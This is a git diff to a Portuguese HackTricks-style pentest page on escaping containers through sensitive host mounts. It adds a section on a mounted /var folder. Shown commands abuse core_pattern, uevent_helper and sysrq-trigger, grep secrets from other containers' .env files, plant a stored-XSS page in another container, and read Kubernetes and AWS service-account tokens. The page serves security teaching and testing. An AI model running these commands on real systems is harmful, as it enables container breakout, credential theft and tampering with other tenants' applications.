diff --git a/src/images/stored-xss-via-mounted-var-folder.png b/src/images/stored-xss-via-mounted-var-folder.png
new file mode 100644
index 000000000..85971746d
Binary files /dev/null and b/src/images/stored-xss-via-mounted-var-folder.png differ
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
index 8f482a3f7..a5ca1d32a 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
@@ -2,9 +2,9 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-A exposição de `/proc` e `/sys` sem a devida isolação de namespace introduz riscos de segurança significativos, incluindo aumento da superfície de ataque e divulgação de informações. Esses diretórios contêm arquivos sensíveis que, se mal configurados ou acessados por um usuário não autorizado, podem levar à fuga de contêiner, modificação do host ou fornecer informações que auxiliem ataques adicionais. Por exemplo, montar incorretamente `-v /proc:/host/proc` pode contornar a proteção do AppArmor devido à sua natureza baseada em caminho, deixando `/host/proc` desprotegido.
+A exposição de `/proc`, `/sys` e `/var` sem o devido isolamento de namespace introduz riscos de segurança significativos, incluindo aumento da superfície de ataque e divulgação de informações. Esses diretórios contêm arquivos sensíveis que, se mal configurados ou acessados por um usuário não autorizado, podem levar à fuga de contêiner, modificação do host ou fornecer informações que auxiliem ataques adicionais. Por exemplo, montar incorretamente `-v /proc:/host/proc` pode contornar a proteção do AppArmor devido à sua natureza baseada em caminho, deixando `/host/proc` desprotegido.
 
-**Você pode encontrar mais detalhes sobre cada potencial vulnerabilidade em** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
+**Você pode encontrar mais detalhes sobre cada vulnerabilidade potencial em** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
 
 ## Vulnerabilidades do procfs
 
@@ -19,10 +19,10 @@ Este diretório permite o acesso para modificar variáveis do kernel, geralmente
 - **Exemplo de Teste e Exploração**:
 
 ```bash
-[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Testa acesso de escrita
+[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Testar acesso de escrita
 cd /proc/sys/kernel
-echo "|$overlay/shell.sh" > core_pattern # Define manipulador personalizado
-sleep 5 && ./crash & # Aciona manipulador
+echo "|$overlay/shell.sh" > core_pattern # Definir manipulador personalizado
+sleep 5 && ./crash & # Acionar manipulador
 ```
 
 #### **`/proc/sys/kernel/modprobe`**
@@ -32,7 +32,7 @@ sleep 5 && ./crash & # Aciona manipulador
 - **Exemplo de Verificação de Acesso**:
 
 ```bash
-ls -l $(cat /proc/sys/kernel/modprobe) # Verifica acesso ao modprobe
+ls -l $(cat /proc/sys/kernel/modprobe) # Verificar acesso ao modprobe
 ```
 
 #### **`/proc/sys/vm/panic_on_oom`**
@@ -42,13 +42,13 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Verifica acesso ao modprobe
 
 #### **`/proc/sys/fs`**
 
-- Conforme [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html), contém opções e informações sobre o sistema de arquivos.
+- De acordo com [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html), contém opções e informações sobre o sistema de arquivos.
 - O acesso de escrita pode permitir vários ataques de negação de serviço contra o host.
 
 #### **`/proc/sys/fs/binfmt_misc`**
 
 - Permite registrar interpretadores para formatos binários não nativos com base em seu número mágico.
-- Pode levar à escalada de privilégios ou acesso ao shell root se `/proc/sys/fs/binfmt_misc/register` for gravável.
+- Pode levar à escalada de privilégios ou acesso a shell root se `/proc/sys/fs/binfmt_misc/register` for gravável.
 - Exploit relevante e explicação:
 - [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc)
 - Tutorial aprofundado: [Video link](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
@@ -71,7 +71,7 @@ echo b > /proc/sysrq-trigger # Reinicializa o host
 
 #### **`/proc/kmsg`**
 
-- Expõe mensagens do buffer de anel do kernel.
+- Exibe mensagens do buffer de anel do kernel.
 - Pode ajudar em exploits do kernel, vazamentos de endereços e fornecer informações sensíveis do sistema.
 
 #### **`/proc/kallsyms`**
@@ -85,7 +85,7 @@ echo b > /proc/sysrq-trigger # Reinicializa o host
 
 - Interface com o dispositivo de memória do kernel `/dev/mem`.
 - Historicamente vulnerável a ataques de escalada de privilégios.
-- Mais em [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
+- Mais sobre [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
 
 #### **`/proc/kcore`**
 
@@ -107,12 +107,12 @@ echo b > /proc/sysrq-trigger # Reinicializa o host
 #### **`/proc/sched_debug`**
 
 - Retorna informações de agendamento de processos, contornando as proteções do namespace PID.
-- Expõe nomes de processos, IDs e identificadores de cgroup.
+- Exibe nomes de processos, IDs e identificadores de cgroup.
 
 #### **`/proc/[pid]/mountinfo`**
 
 - Fornece informações sobre pontos de montagem no namespace de montagem do processo.
-- Expõe a localização do `rootfs` ou imagem do contêiner.
+- Exibe a localização do `rootfs` ou imagem do contêiner.
 
 ### Vulnerabilidades do `/sys`
 
@@ -130,7 +130,7 @@ echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /ev
 
 host*path=$(sed -n 's/.*\perdir=(\[^,]\_).\*/\1/p' /etc/mtab)
 
-#### Define uevent_helper para o helper malicioso
+#### Define uevent_helper para o manipulador malicioso
 
 echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
 
@@ -157,14 +157,100 @@ cat /output %%%
 
 #### **`/sys/firmware/efi/vars` e `/sys/firmware/efi/efivars`**
 
-- Expõe interfaces para interagir com variáveis EFI na NVRAM.
-- A má configuração ou exploração pode levar a laptops brickados ou máquinas host não inicializáveis.
+- Expondo interfaces para interagir com variáveis EFI na NVRAM.
+- Má configuração ou exploração pode levar a laptops brickados ou máquinas host não inicializáveis.
 
 #### **`/sys/kernel/debug`**
 
 - `debugfs` oferece uma interface de depuração "sem regras" para o kernel.
 - Histórico de problemas de segurança devido à sua natureza irrestrita.
 
+### Vulnerabilidades do `/var`
+
+A pasta **/var** do host contém sockets de tempo de execução do contêiner e os sistemas de arquivos dos contêineres. Se esta pasta for montada dentro de um contêiner, esse contêiner terá acesso de leitura e escrita aos sistemas de arquivos de outros contêineres com privilégios de root. Isso pode ser abusado para pivotar entre contêineres, causar uma negação de serviço ou backdoor em outros contêineres e aplicativos que rodam neles.
+
+#### Kubernetes
+
+Se um contêiner como este for implantado com Kubernetes:
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+name: pod-mounts-var
+labels:
+app: pentest
+spec:
+containers:
+- name: pod-mounts-var-folder
+image: alpine
+volumeMounts:
+- mountPath: /host-var
+name: noderoot
+command: [ "/bin/sh", "-c", "--" ]
+args: [ "while true; do sleep 30; done;" ]
+volumes:
+- name: noderoot
+hostPath:
+path: /var
+```
+Dentro do **pod-mounts-var-folder** container:
+```bash
+/ # find /host-var/ -type f -iname '*.env*' 2>/dev/null
+
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/201/fs/usr/src/app/.env.example
+<SNIP>
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/135/fs/docker-entrypoint.d/15-local-resolvers.envsh
+
+/ # cat /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/105/fs/usr/src/app/.env.example | grep -i secret
+JWT_SECRET=85d<SNIP>a0
+REFRESH_TOKEN_SECRET=14<SNIP>ea
+
+/ # find /host-var/ -type f -iname 'index.html' 2>/dev/null
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/57/fs/usr/src/app/node_modules/@mapbox/node-pre-gyp/lib/util/nw-pre-gyp/index.html
+<SNIP>
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index.html
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/132/fs/usr/share/nginx/html/index.html
+
+/ # echo '<!DOCTYPE html><html lang="en"><head><script>alert("Stored XSS!")</script></head></html>' > /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/sh
+are/nginx/html/index2.html
+```
+O XSS foi alcançado:
+
+![Stored XSS via mounted /var folder](/images/stored-xss-via-mounted-var-folder.png)
+
+Observe que o contêiner NÃO requer uma reinicialização ou qualquer coisa. Quaisquer alterações feitas através da pasta montada **/var** serão aplicadas instantaneamente.
+
+Você também pode substituir arquivos de configuração, binários, serviços, arquivos de aplicativo e perfis de shell para alcançar RCE automático (ou semi-automático).
+
+##### Acesso a credenciais de nuvem
+
+O contêiner pode ler tokens de serviceaccount do K8s ou tokens de webidentity da AWS, o que permite que o contêiner obtenha acesso não autorizado ao K8s ou à nuvem:
+```bash
+/ # cat /host-var/run/secrets/kubernetes.io/serviceaccount/token
+/ # cat /host-var/run/secrets/eks.amazonaws.com/serviceaccount/token
+```
+#### Docker
+
+A exploração no Docker (ou em implantações do Docker Compose) é exatamente a mesma, exceto que geralmente os sistemas de arquivos dos outros contêineres estão disponíveis sob um caminho base diferente:
+```bash
+$ docker info | grep -i 'docker root\|storage driver'
+Storage Driver: overlay2
+Docker Root Dir: /var/lib/docker
+```
+Os sistemas de arquivos estão sob `/var/lib/docker/overlay2/`:
+```bash
+$ sudo ls -la /var/lib/docker/overlay2
+
+drwx--x---  4 root root  4096 Jan  9 22:14 00762bca8ea040b1bb28b61baed5704e013ab23a196f5fe4758dafb79dfafd5d
+drwx--x---  4 root root  4096 Jan 11 17:00 03cdf4db9a6cc9f187cca6e98cd877d581f16b62d073010571e752c305719496
+drwx--x---  4 root root  4096 Jan  9 21:23 049e02afb3f8dec80cb229719d9484aead269ae05afe81ee5880ccde2426ef4f
+drwx--x---  4 root root  4096 Jan  9 21:22 062f14e5adbedce75cea699828e22657c8044cd22b68ff1bb152f1a3c8a377f2
+<SNIP>
+```
+#### Nota
+
+Os caminhos reais podem diferir em diferentes configurações, por isso a melhor opção é usar o comando **find** para localizar os sistemas de arquivos de outros contêineres.
+
 ### Referências
 
 - [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)